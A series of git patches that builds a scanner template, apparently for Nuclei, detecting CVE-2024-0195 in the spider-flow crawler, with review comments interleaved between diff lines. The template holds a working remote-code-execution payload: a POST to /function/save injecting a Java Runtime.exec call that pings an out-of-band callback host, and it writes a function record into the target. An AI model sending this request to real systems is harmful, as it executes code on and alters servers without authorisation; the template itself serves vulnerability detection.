From 6964302bbde66b08699f9ea4f116a2c12f95816c Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 23 May 2024 16:37:32 +0530
Subject: [PATCH 1/5] Create CVE-2024-0195.yaml
---
 http/cves/2024/CVE-2024-0195.yaml | 42 +++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 http/cves/2024/CVE-2024-0195.yaml
diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml
new file mode 100644
index 00000000000..cf2a26bb41f
--- /dev/null
+++ b/http/cves/2024/CVE-2024-0195.yaml
@@ -0,0 +1,42 @@
+id: CVE-2024-0195
+
+info:
+ name: SpiderFlow Crawler Platform - Remote Code Execution
+ author: pussycat0x
+ severity: critical
+ description: |
+ A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.
+ reference:
+ - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md
+ - https://github.com/wy876/wiki
+ - https://github.com/xingchennb/POC-
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-0195
+ cwe-id: CWE-94
+ epss-score: 0.00107
+ epss-percentile: 0.43408
+ cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:*
+ metadata:
+ verified: true
+ max-request: 1
+ vendor: ssssssss
+ product: spider-flow
+ fofa-query: app="SpiderFlow"
+
+http:
+ - raw:
+ - |
+ POST /function/save HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+ X-Requested-With: XMLHttpRequest
+
+ id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B
+
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "dns"
From 594c949fc01a1e4512cb03d7443f03e8c6edc8d1 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 23 May 2024 16:51:12 +0530
Subject: [PATCH 2/5] Update CVE-2024-0195.yaml
---
 http/cves/2024/CVE-2024-0195.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml
index cf2a26bb41f..c8a0ee3d6b1 100644
--- a/http/cves/2024/CVE-2024-0195.yaml
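Review bot: The probe in the `script` parameter runs `ping {{interactsh-url}}` with no count flag, so on a Linux target the spawned ping never exits on its own and every scan leaves a process running; `ping -c 1 {{interactsh-url}}` (the flag is `-n 1` on Windows) or `nslookup {{interactsh-url}}` produces the same DNS callback and terminates. The request also persists a function (`id=1&name=cmd`) in the target application, a state change that presumably replaces whatever record already has id 1 — worth confirming against the controller — and that should be stated in the description and reflected by an `intrusive` tag. Matching on `interactsh_protocol` `dns` is the right choice here, since name resolution fires even where outbound ICMP is filtered.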
+++ b/http/cves/2024/CVE-2024-0195.yaml
@@ -32,7 +32,7 @@ http:
 Host: {{Hostname}}
 Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 X-Requested-With: XMLHttpRequest
-
+
 id=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+{{interactsh-url}}')%3B%7B

 matchers:
From 81fe704a0e93d7f35164fac12638687bb02fb2c2 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 23 May 2024 18:15:41 +0530
Subject: [PATCH 3/5] Update CVE-2024-0195.yaml
---
 http/cves/2024/CVE-2024-0195.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml
index c8a0ee3d6b1..42561d03f07 100644
--- a/http/cves/2024/CVE-2024-0195.yaml
+++ b/http/cves/2024/CVE-2024-0195.yaml
@@ -24,6 +24,7 @@ info:
 vendor: ssssssss
 product: spider-flow
 fofa-query: app="SpiderFlow"
+ tags: cve,cve2024,spiderflow

 http:
 - raw:
From 3ae722960fff74d21ba443488dd5e8252537966c Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 23 May 2024 18:19:04 +0530
Subject: [PATCH 4/5] Update CVE-2024-0195.yaml
---
 http/cves/2024/CVE-2024-0195.yaml | 23 ++++++++++++++++++-----
 1 file changed, 18 insertions(+), 5 deletions(-)
diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml
index 42561d03f07..5da0534c4cb 100644
--- a/http/cves/2024/CVE-2024-0195.yaml
+++ b/http/cves/2024/CVE-2024-0195.yaml
@@ -8,15 +8,15 @@ info:
 A vulnerability, which was classified as critical, was found in spider-flow 0.4.3. Affected is the function FunctionService.saveFunction of the file src/main/java/org/spiderflow/controller/FunctionController.java. The manipulation leads to code injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-249510 is the identifier assigned to this vulnerability.
 reference:
 - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md
- - https://github.com/wy876/wiki
- - https://github.com/xingchennb/POC-
+ - https://vuldb.com/?id.249510
+ - https://nvd.nist.gov/vuln/detail/CVE-2024-0195
 classification:
 cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
 cvss-score: 9.8
 cve-id: CVE-2024-0195
 cwe-id: CWE-94
 epss-score: 0.00107
- epss-percentile: 0.43408
+ epss-percentile: 0.43423
 cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:*
 metadata:
 verified: true
@@ -24,9 +24,22 @@ info:
 vendor: ssssssss
 product: spider-flow
 fofa-query: app="SpiderFlow"
- tags: cve,cve2024,spiderflow
+ tags: cve,cve2024,spiderflow,crawler,unauth,rce
+
+flow: http(1) && http(2)

 http:
+ - raw:
+ - |
+ GET / HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: word
+ internal: true
+ words:
+ - 'SPIDER_FLOW_VERSION'
+
 - raw:
 - |
 POST /function/save HTTP/1.1
@@ -40,4 +40,4 @@ http:
 - type: word
 part: interactsh_protocol
 words:
- - "dns"
+ - "http"
From ef3e4afa7ad016d187700c25101aec1eb6f0e511 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran
Date: Thu, 23 May 2024 18:20:05 +0530
Subject: [PATCH 5/5] dns update
---
 http/cves/2024/CVE-2024-0195.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml
index 5da0534c4cb..c458ad3cd32 100644
--- a/http/cves/2024/CVE-2024-0195.yaml
+++ b/http/cves/2024/CVE-2024-0195.yaml
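Review bot: `max-request: 1` in `metadata`, written in the first patch and untouched here, is now stale: the new `flow: http(1) && http(2)` line makes the template send the fingerprint `GET /` before the `POST /function/save`, so it should read `max-request: 2`. The new tags `unauth,rce` are accurate, but the second request still stores a function on the target, so `intrusive` belongs in the tag list as well, e.g. `tags: cve,cve2024,spiderflow,crawler,unauth,rce,intrusive`. Gating the state-changing POST behind the `SPIDER_FLOW_VERSION` fingerprint with `internal: true` is a sound reduction in blast radius; pinning that matcher with `part: body` would make the intent explicit.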
@@ -53,4 +53,4 @@ http:
 - type: word
 part: interactsh_protocol
 words:
- - "http"
+ - "dns"